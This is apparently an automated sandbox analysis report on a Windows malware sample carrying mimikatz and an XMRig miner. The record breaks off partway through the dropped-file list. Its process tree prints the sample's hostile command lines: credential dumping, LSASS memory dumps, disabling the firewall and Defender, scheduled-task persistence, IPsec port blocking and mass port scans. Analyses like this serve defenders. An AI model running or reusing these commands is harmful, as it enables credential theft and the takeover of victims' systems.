Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 09:04

General

  • Target

    2024-11-14_03b7ab4994e772ed8b882434e7c75f7d_hacktools_icedid_mimikatz.exe

  • Size

    9.1MB

  • MD5

    03b7ab4994e772ed8b882434e7c75f7d

  • SHA1

    ffb9f94f26e4d0c9b65f6c5a0fbf7b473c478ebc

  • SHA256

    f0b74899b3161f7c92dcc5051ba5622319573e0b88a379f35bd3ca0b244b002a

  • SHA512

    ebf4512709bc10f5b11604306b63657e00302d803c3efa98075c2e9438d28df4529b168289f22d5a857d51c6a17933a7af783963ff699f6e8fb91bcc5a249c3d

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (17045) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 8 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 24 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:308
      • C:\Windows\TEMP\yplbrbilk\jebdql.exe
        "C:\Windows\TEMP\yplbrbilk\jebdql.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:900
    • C:\Users\Admin\AppData\Local\Temp\2024-11-14_03b7ab4994e772ed8b882434e7c75f7d_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-14_03b7ab4994e772ed8b882434e7c75f7d_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2512
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\sbbjtutk\tpltztt.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:824
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:320
        • C:\Windows\sbbjtutk\tpltztt.exe
          C:\Windows\sbbjtutk\tpltztt.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2160
    • C:\Windows\sbbjtutk\tpltztt.exe
      C:\Windows\sbbjtutk\tpltztt.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2692
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2668
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2696
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2812
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2572
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2804
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:2656
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1368
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:1560
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\qpliatbez\itbbubukb\wpcap.exe /S
          2⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\qpliatbez\itbbubukb\wpcap.exe
            C:\Windows\qpliatbez\itbbubukb\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1588
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2624
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:1784
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2872
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1924
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2960
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                    PID:2980
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                    PID:2120
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1940
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2516
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1140
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:764
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2912
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:964
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1624
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\qpliatbez\itbbubukb\ebhtiljtp.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\qpliatbez\itbbubukb\Scant.txt
                2⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1068
                • C:\Windows\qpliatbez\itbbubukb\ebhtiljtp.exe
                  C:\Windows\qpliatbez\itbbubukb\ebhtiljtp.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\qpliatbez\itbbubukb\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1096
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\qpliatbez\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\qpliatbez\Corporate\log.txt
                2⤵
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:2908
                • C:\Windows\qpliatbez\Corporate\vfshost.exe
                  C:\Windows\qpliatbez\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2348
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lrqzzquei" /ru system /tr "cmd /c C:\Windows\ime\tpltztt.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:924
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:1772
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "lrqzzquei" /ru system /tr "cmd /c C:\Windows\ime\tpltztt.exe"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:2620
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qbltkcjuu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\sbbjtutk\tpltztt.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2076
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:2400
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "qbltkcjuu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\sbbjtutk\tpltztt.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:320
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kldpqteip" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\yplbrbilk\jebdql.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1072
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2880
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "kldpqteip" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\yplbrbilk\jebdql.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2876
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1076
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:2692
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2780
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2044
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:2664
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2584
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:576
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3000
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2288
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:276
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1448
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2624
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2872
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                        PID:2960
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2972
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                        PID:3012
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3004
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1992
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:2508
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2156
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2248
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1508
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2100
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1636
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                              PID:1312
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:856
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                              PID:1956
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2228
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2080
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1300
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1712
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1068
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1440
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:696
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:988
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:916
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:1736
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 308 C:\Windows\TEMP\qpliatbez\308.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1804
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 1116 C:\Windows\TEMP\qpliatbez\1116.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2176
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 1172 C:\Windows\TEMP\qpliatbez\1172.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2748
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 1284 C:\Windows\TEMP\qpliatbez\1284.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1128
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 1616 C:\Windows\TEMP\qpliatbez\1616.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2860
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 2392 C:\Windows\TEMP\qpliatbez\2392.dmp
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2724
                          • C:\Windows\TEMP\qpliatbez\ltkelldpt.exe
                            C:\Windows\TEMP\qpliatbez\ltkelldpt.exe -accepteula -mp 2296 C:\Windows\TEMP\qpliatbez\2296.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:768
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\qpliatbez\itbbubukb\scan.bat
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2148
                            • C:\Windows\qpliatbez\itbbubukb\jblckupty.exe
                              jblckupty.exe TCP 181.215.0.1 181.215.255.255 445 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:2916
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2436
                        • C:\Windows\SysWOW64\huzbeq.exe
                          C:\Windows\SysWOW64\huzbeq.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:1384
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {41ADFDDA-6302-4BDB-A885-D1F521AD6823} S-1-5-18:NT AUTHORITY\System:Service:
                          1⤵
                            PID:2888
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tpltztt.exe
                              2⤵
                                PID:2788
                                • C:\Windows\ime\tpltztt.exe
                                  C:\Windows\ime\tpltztt.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2592
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\sbbjtutk\tpltztt.exe /p everyone:F
                                2⤵
                                  PID:2848
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                      PID:2540
                                    • C:\Windows\system32\cacls.exe
                                      cacls C:\Windows\sbbjtutk\tpltztt.exe /p everyone:F
                                      3⤵
                                        PID:1316
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\yplbrbilk\jebdql.exe /p everyone:F
                                      2⤵
                                        PID:2072
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                            PID:2568
                                          • C:\Windows\system32\cacls.exe
                                            cacls C:\Windows\TEMP\yplbrbilk\jebdql.exe /p everyone:F
                                            3⤵
                                              PID:2984
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tpltztt.exe
                                            2⤵
                                              PID:4004
                                              • C:\Windows\ime\tpltztt.exe
                                                C:\Windows\ime\tpltztt.exe
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2900
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\yplbrbilk\jebdql.exe /p everyone:F
                                              2⤵
                                                PID:2448
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  3⤵
                                                    PID:2620
                                                  • C:\Windows\system32\cacls.exe
                                                    cacls C:\Windows\TEMP\yplbrbilk\jebdql.exe /p everyone:F
                                                    3⤵
                                                      PID:304
                                                  • C:\Windows\system32\cmd.EXE
                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\sbbjtutk\tpltztt.exe /p everyone:F
                                                    2⤵
                                                      PID:3976
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:2832
                                                        • C:\Windows\system32\cacls.exe
                                                          cacls C:\Windows\sbbjtutk\tpltztt.exe /p everyone:F
                                                          3⤵
                                                            PID:2696
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                        1⤵
                                                          PID:1980
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                          1⤵
                                                            PID:1672
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                            1⤵
                                                              PID:2020

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Windows\SysWOW64\Packet.dll

                                                              Filesize

                                                              95KB

                                                              MD5

                                                              86316be34481c1ed5b792169312673fd

                                                              SHA1

                                                              6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                              SHA256

                                                              49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                              SHA512

                                                              3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                            • C:\Windows\SysWOW64\wpcap.dll

                                                              Filesize

                                                              275KB

                                                              MD5

                                                              4633b298d57014627831ccac89a2c50b

                                                              SHA1

                                                              e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                              SHA256

                                                              b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                              SHA512

                                                              29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                            • C:\Windows\TEMP\qpliatbez\1116.dmp

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              68b38f107897821dc34aa30d87e2c036

                                                              SHA1

                                                              780f2348d6ff44eb01f1a04db2b8748f5b54a7fc

                                                              SHA256

                                                              3308379ee04d0e474bedb013886627b4ec42a992d51a6d3db0b0beb57bdc6f5f

                                                              SHA512

                                                              f55f83cfda8f5adaa86641821d4b8c372af27d61be833fd53a109612609c1642a351637aa63c2c6a33a3807abfe1d0764ace4e717063f3561b62210b6d0c65f0

                                                            • C:\Windows\TEMP\qpliatbez\1172.dmp

                                                              Filesize

                                                              1.3MB

                                                              MD5

                                                              a5f56bf32607ec49cb1fb69c2ad5b075

                                                              SHA1

                                                              91b25745fe5e864301294f770aaddf24dcc776d6

                                                              SHA256

                                                              c5bf3712a2ab59a6d005205378d6af3b45add00f4f52abde245fdd6f47e8d573

                                                              SHA512

                                                              776ab227b8d0cd379f961753dd353668822600876c54ace9a37528a0cdc60b868c003a1f3e8822fed1430e3b2cc332a679c305ac3e5efdce7c8a0975ca3f9e2a

                                                            • C:\Windows\TEMP\qpliatbez\1284.dmp

                                                              Filesize

                                                              5.3MB

                                                              MD5

